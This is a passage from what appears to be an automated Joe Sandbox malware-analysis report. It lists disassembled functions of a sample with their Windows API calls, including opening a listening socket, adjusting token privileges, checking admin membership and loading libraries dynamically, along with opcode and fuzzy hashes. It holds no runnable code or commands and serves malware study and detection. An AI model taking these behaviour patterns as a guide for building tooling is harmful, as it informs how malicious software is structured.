                            • TerminateProcess.KERNEL32 ref: 00401AD9
                            • abort.MSVCRT ref: 00401AE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                            • String ID:
                            • API String ID: 520269711-0
                            • Opcode ID: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
                            • Instruction ID: 06684be4768ddce2bfe548fce248f846a3560142eb51a47cff2d5cf3969212e5
                            • Opcode Fuzzy Hash: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
                            • Instruction Fuzzy Hash: 721117B9900701CFD700EF79E94864A7BF0BB09302F418979E94897362E774E844CF5A
                            Function 00DBEDB3 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DBEDC5
                            • closesocket.WS2_32(00000000), ref: 00DBEDD2
                            • htons.WS2_32(?), ref: 00DBEDE3
                            • bind.WS2_32(00000000,?,00000010), ref: 00DBEDFA
                            • listen.WS2_32(00000000,00000078), ref: 00DBEE0B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: bindclosesockethtonslistensocket
                            • String ID:
                            • API String ID: 564772725-0
                            • Opcode ID: 5546e49d767f56db25d24d8bed52f7b2c7aec2182f4a8befcc1dabd2db83c163
                            • Instruction ID: 2cb7a7a2d06787ff50c87ae7c3e9de2e1bdad459bf3c624d934c7f5cdef14b9b
                            • Opcode Fuzzy Hash: 5546e49d767f56db25d24d8bed52f7b2c7aec2182f4a8befcc1dabd2db83c163
                            • Instruction Fuzzy Hash: A2F08135881254F6DA103BB49C0BBEE77289F11734F104356F9B7AA1D2E7B0864493BA
                            Function 00DB21D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,?), ref: 00DB22C8
                            • LoadLibraryA.KERNEL32(00000000,?,00000000,?), ref: 00DB22D3
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DB22DB
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
                            • String ID: %s!%s
                            • API String ID: 2092861438-2935588013
                            • Opcode ID: 886e77d536adfdff62672831c84a89e8c09880d66f04f3856277200e6b5ec38d
                            • Instruction ID: d7dad79c8ef67afa26a7f0a3d05b7b5f976c5808c6e61f702c9d3bdfe430e13b
                            • Opcode Fuzzy Hash: 886e77d536adfdff62672831c84a89e8c09880d66f04f3856277200e6b5ec38d
                            • Instruction Fuzzy Hash: 2A41D577904100DBDF189FA0D885EFA37B9EB84720F794056EA07EB281DA34DD4287B9
                            Function 00DB21D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,?), ref: 00DB22C8
                            • LoadLibraryA.KERNEL32(00000000,?,00000000,?), ref: 00DB22D3
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DB22DB
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
                            • String ID: %s!%s
                            • API String ID: 2092861438-2935588013
                            • Opcode ID: e3455d6bdc65aa6bc8be5033fd89f4ca53bd3da2825a6aa452d15bcc181f7c8e
                            • Instruction ID: d7dad79c8ef67afa26a7f0a3d05b7b5f976c5808c6e61f702c9d3bdfe430e13b
                            • Opcode Fuzzy Hash: e3455d6bdc65aa6bc8be5033fd89f4ca53bd3da2825a6aa452d15bcc181f7c8e
                            • Instruction Fuzzy Hash: 2A41D577904100DBDF189FA0D885EFA37B9EB84720F794056EA07EB281DA34DD4287B9
                            Function 00DB41CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00DB4227
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00DB424A
                            • GetLastError.KERNEL32 ref: 00DB4254
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                            • String ID: %s
                            • API String ID: 2004037343-620797490
                            • Opcode ID: d671fc86671c4f2476bf730bd1ff7e9754596a19a974a9d31d771fbd772934c8
                            • Instruction ID: 1574750afb96ca86c0ff61f9a32f22041c9eecf7cbb971c0f5a788b189f43cac
                            • Opcode Fuzzy Hash: d671fc86671c4f2476bf730bd1ff7e9754596a19a974a9d31d771fbd772934c8
                            • Instruction Fuzzy Hash: 02114A76900219FAEB11DFA8DD45AFFBBBCEF08350B100426F905E6151E6319E0896B5
                            Function 00DB41CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00DB4227
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00DB424A
                            • GetLastError.KERNEL32 ref: 00DB4254
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                            • String ID: %s
                            • API String ID: 2004037343-620797490
                            • Opcode ID: 48756c8de3f27635fac505c02c9e297aac22576c041ce1ce9de54a3e52996fad
                            • Instruction ID: 1574750afb96ca86c0ff61f9a32f22041c9eecf7cbb971c0f5a788b189f43cac
                            • Opcode Fuzzy Hash: 48756c8de3f27635fac505c02c9e297aac22576c041ce1ce9de54a3e52996fad
                            • Instruction Fuzzy Hash: 02114A76900219FAEB11DFA8DD45AFFBBBCEF08350B100426F905E6151E6319E0896B5
                            Function 00DB7E57 Relevance: 6.1, APIs: 4, Instructions: 63sleepnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB7E66
                            • Sleep.KERNEL32(000003E8), ref: 00DB7EB6
                            • GetTickCount.KERNEL32 ref: 00DB7EBC
                            • WSAGetLastError.WS2_32 ref: 00DB7EC2
                              • Part of subcall function 00DB7E11: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00DB7E23
                              • Part of subcall function 00DB75E5: _memset.LIBCMT ref: 00DB7606
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$ErrorLastSleep_memsetioctlsocket
                            • String ID:
                            • API String ID: 3301373915-0
                            • Opcode ID: 7397935bee361eb1395b79fd199930c1949dd08b8b39d21cdc24570ce58b0d73
                            • Instruction ID: 2380c01531a847719cf825d7cc28aa97867fcb3e111137063ec1939a42db1854
                            • Opcode Fuzzy Hash: 7397935bee361eb1395b79fd199930c1949dd08b8b39d21cdc24570ce58b0d73
                            • Instruction Fuzzy Hash: BC117072C0820AEBDB0177B59C869EE7BA8DF84764F240023F602A6191EE309D8597B5
                            Function 00DB3685 Relevance: 4.6, APIs: 3, Instructions: 68sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(000003E8), ref: 00DB3707
                            • Sleep.KERNEL32(000003E8,00000000,?,?,00000000), ref: 00DB3720
                            • closesocket.WS2_32(00000000), ref: 00DB3727
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$closesocket
                            • String ID:
                            • API String ID: 1480910923-0
                            • Opcode ID: 2c2b2ce40d1465964f89295a1d43842caa7545342d65f725d138f1d669df8578
                            • Instruction ID: b2b9d993faee98f7bad836e14df956a8078451dfeb62a8753f626edaff4b20f4
                            • Opcode Fuzzy Hash: 2c2b2ce40d1465964f89295a1d43842caa7545342d65f725d138f1d669df8578
                            • Instruction Fuzzy Hash: C4116DB2C00218EBDF01ABF49C82CDD7B78EF04320F240527F112A6191EE359604AB75
                            Function 00DBE442 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,74DF2E90,?,?,?,00DB80ED), ref: 00DBE475
                            • CheckTokenMembership.ADVAPI32(00000000,?,00DB80ED,?,?,?,00DB80ED), ref: 00DBE48A
                            • FreeSid.ADVAPI32(?,?,?,?,00DB80ED), ref: 00DBE49A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            • API String ID: 3429775523-0
                            • Opcode ID: df1425956a1023e337678163ab9acbb9120de10e079168268264eda6ab881f9b
                            • Instruction ID: ef6217ff4e5f2f519d8e885a6fe2271e778df27097d3980610e8278c1afa6708
                            • Opcode Fuzzy Hash: df1425956a1023e337678163ab9acbb9120de10e079168268264eda6ab881f9b
                            • Instruction Fuzzy Hash: 2E011D76945288FFDB11DBE88C84AEEBFBCAB15204F44449AA511E3241D3709B08DB35
                            Function 00DB91C2 Relevance: 4.5, APIs: 3, Instructions: 11memorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteProcThreadAttributeList.KERNEL32(00DB934A,?,00DB934A,00000000), ref: 00DB91C8
                            • GetProcessHeap.KERNEL32(00000000,00DB934A,?,00DB934A,00000000), ref: 00DB91D3
                            • HeapFree.KERNEL32(00000000,?,00DB934A,00000000), ref: 00DB91DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AttributeDeleteFreeListProcProcessThread
                            • String ID:
                            • API String ID: 551783810-0
                            • Opcode ID: 6155b83e8743b315ee007a9921d15385ce61c8e9f8b407c3fb28189419e379ad
                            • Instruction ID: a951b2b3d821f35ee67a080bfda2c3e4f9fd43a857c4000bc1d11e27bf59586d
                            • Opcode Fuzzy Hash: 6155b83e8743b315ee007a9921d15385ce61c8e9f8b407c3fb28189419e379ad
                            • Instruction Fuzzy Hash: DAC00232045348FFDF112FE1EC0DA9A7F29EB0A66AF018013F61DC56A1CB7295519BB1
                            Function 00DD7320 Relevance: 4.4, Strings: 3, Instructions: 612COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $<$abcdefghijklmnop
                            • API String ID: 0-2431890337
                            • Opcode ID: 825b59aef45760b650a700909c1b35609783ae259bdea21978c9f2b5c29bb4c4
                            • Instruction ID: 666d8f6e3687e407bedaf9723322d529f03a767473ee96bd9366fc28d73f5761
                            • Opcode Fuzzy Hash: 825b59aef45760b650a700909c1b35609783ae259bdea21978c9f2b5c29bb4c4
                            • Instruction Fuzzy Hash: 9C52F475E002598FDB48CF69C491AADBBF1EF4D300F14C1AAE865AB352D234E951CFA4
                            Function 00D96720 Relevance: 3.1, Strings: 2, Instructions: 612COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $<
                            • API String ID: 0-428540627
                            • Opcode ID: 8f17b7d656fda2f539b22130276217b8beca0b9ca9f1e22ccb95e8b605794827
                            • Instruction ID: fd178c8c37e2557c92c1984edd401c16fd1adec4bae82b58e68c1d1e2c606e4c
                            • Opcode Fuzzy Hash: 8f17b7d656fda2f539b22130276217b8beca0b9ca9f1e22ccb95e8b605794827
                            • Instruction Fuzzy Hash: 6752E375A102198FDB48CF69C491AADBBF1EF8D300F14C16AE865AB352C234E951CFA4
                            Function 00DB7E57 Relevance: 3.1, APIs: 2, Instructions: 63sleepnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(000003E8), ref: 00DB7EB6
                            • WSAGetLastError.WS2_32 ref: 00DB7EC2
                              • Part of subcall function 00DB7E11: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00DB7E23
                              • Part of subcall function 00DB75E5: _memset.LIBCMT ref: 00DB7606
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastSleep_memsetioctlsocket
                            • String ID:
                            • API String ID: 4193628849-0
                            • Opcode ID: 7e7743ce85dbad4c5b81ac384653d6f0fed9f7b7a2bee776d3f98450f482e452
                            • Instruction ID: 2380c01531a847719cf825d7cc28aa97867fcb3e111137063ec1939a42db1854
                            • Opcode Fuzzy Hash: 7e7743ce85dbad4c5b81ac384653d6f0fed9f7b7a2bee776d3f98450f482e452
                            • Instruction Fuzzy Hash: BC117072C0820AEBDB0177B59C869EE7BA8DF84764F240023F602A6191EE309D8597B5
                            Function 00DD8190 Relevance: .4, Instructions: 435COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52ab5c385dc5cbe30193eeadd58545ad297c790370df914d4dc5477e40e4bae5
                            • Instruction ID: 4ce7199980ca9cbb3ab4e5ba34a3495993519f54de26b916c99ca9b1bb766950
                            • Opcode Fuzzy Hash: 52ab5c385dc5cbe30193eeadd58545ad297c790370df914d4dc5477e40e4bae5
                            • Instruction Fuzzy Hash: 3A1271719201598FCB08CF5DD891ABDBBF1EF49301F48816EE456EB386CA38E611DB64
                            Function 00D97590 Relevance: .4, Instructions: 435COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 713d4da708e507e8e1ad1b26dcf6fc677549dbd504e9a6ab50fae4ca0ac85f09
                            • Instruction ID: 9c000924473d6e627add4c71c522c2cd61c043e3d2c7cf6e308a8ca813a53a89
                            • Opcode Fuzzy Hash: 713d4da708e507e8e1ad1b26dcf6fc677549dbd504e9a6ab50fae4ca0ac85f09
                            • Instruction Fuzzy Hash: C91272319101698FDB08CF5DC8D1ABDBBF1EF49341F54826EE4569B386C638EA12DB60
                            Function 00DD7BC0 Relevance: .4, Instructions: 406COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bcf4a93cf0e073b3dc1f03daa1e0a326a8bdfedaa49a37eb3d1dfebbb949f1c
                            • Instruction ID: eb3a02a25adb7a70c866b771063a4dcf60f4a6fd71850e980e6fcfe65194bb18
                            • Opcode Fuzzy Hash: 7bcf4a93cf0e073b3dc1f03daa1e0a326a8bdfedaa49a37eb3d1dfebbb949f1c
                            • Instruction Fuzzy Hash: 98124E719142598FCB08CF5DD8919BDBBF2EF49300F59816AE496EF382C638E611DB60
                            Function 00D96FC0 Relevance: .4, Instructions: 406COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 649c5e0e6f184d593b2a95c2cf2d13bc3a42248f38c8f0b10b3a1c93a9f16d11
                            • Instruction ID: b3a177434e38d9f8d76899524e35401ac714afc3668a0faadb3c23ed4e76b7ba
                            • Opcode Fuzzy Hash: 649c5e0e6f184d593b2a95c2cf2d13bc3a42248f38c8f0b10b3a1c93a9f16d11
                            • Instruction Fuzzy Hash: 3D1250719141A98FDB08CF5DC8D19BDBBF1FF49300F55826AE456AB382C638EA11DB60
                            Function 00DD58FD Relevance: .4, Instructions: 384COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction ID: 024971a3f48ba037cd832ad3432bf4f16ec57a3f43c787c0c05fc17159f836d3
                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction Fuzzy Hash: EED18EB3D1B9B34A8735812D516823BEE626FD175131FC3E29CD43F38E922A9D0596E0
                            Function 00D94CFD Relevance: .4, Instructions: 384COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction ID: eb153aff6c78c3e50fc4acb6481ee2cdd4d61393408d37f29857966efd8d1c41
                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction Fuzzy Hash: 00D16E73D0E9F30A8B36812D4168A3BEA626FD175131FC7E09CD42F28ED5279D1296E0
                            Function 00DD54DD Relevance: .4, Instructions: 378COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction ID: 35d7af85e2380425002d049eea17c84f97b002f2fdede9f2fc2bd6f80c6d66ad
                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction Fuzzy Hash: 95D16DB3D1B9B34B8736812D555863BEA626FD174132EC3E2DCD02F38DD22A9D0596E0
                            Function 00D948DD Relevance: .4, Instructions: 378COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction ID: efa6eb22b3d5bcc2d0fb1c148ee5ea27e6c2c64a7a8f3b6a086e2ed3e41bbff5
                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction Fuzzy Hash: 03D15F73D0E9B30A8B35812D4158A3BEAA26FD175531EC7E1DCD43F28BD6279D0296E0
                            Function 00DD50D1 Relevance: .4, Instructions: 361COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction ID: 9a331a35ab29ac99f8c2fc9dc945c68f0c8a77209035c62b79929aca63ac92a7
                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction Fuzzy Hash: F0C15EB3D1BAF30B8736812D555823BEE626FD175131EC3E28CD42F38E962A9D0595E0
                            Function 00D944D1 Relevance: .4, Instructions: 361COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction ID: 1ffff1910c16ad05e8318616d904641d44652b0ca872a159a275ee5fe6397d80
                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction Fuzzy Hash: 1DC15F73D0E9F30A8B75816D416892BEEA26FD165131FC7E1CCD43F28B92279D0695E0
                            Function 00DD4CFD Relevance: .4, Instructions: 351COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction ID: 1ac66ec217e88482d70d4203b4be3ec0d72d524c7aa3c4de0a74d799f2395903
                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction Fuzzy Hash: FAC15C73D1B9B30B8735822D455813BEAA26FD174132FC7A29CD42F38DD63A9D0595E0
                            Function 00D940FD Relevance: .4, Instructions: 351COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction ID: 6697727c87e02290b33c309a51a50f7b6c555048f46d96a60abe1be685722a3f
                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction Fuzzy Hash: D8C15F73D0E9F30A8B35822D4158A3BEAA26FD175131FC7E19CD42F28BD6279D0295E0
                            Function 00DBB870 Relevance: .2, Instructions: 182COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: 46555ffbed5e9c32628a3f09bd3f0c2a2a625411bf75711ce067e1c17218644d
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 5791BD74E0020ADFCF08CF89C5909EEBBB1BF48315F24819AD8566B315D375AA41DFA5
                            Function 00DBABA0 Relevance: .2, Instructions: 182COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
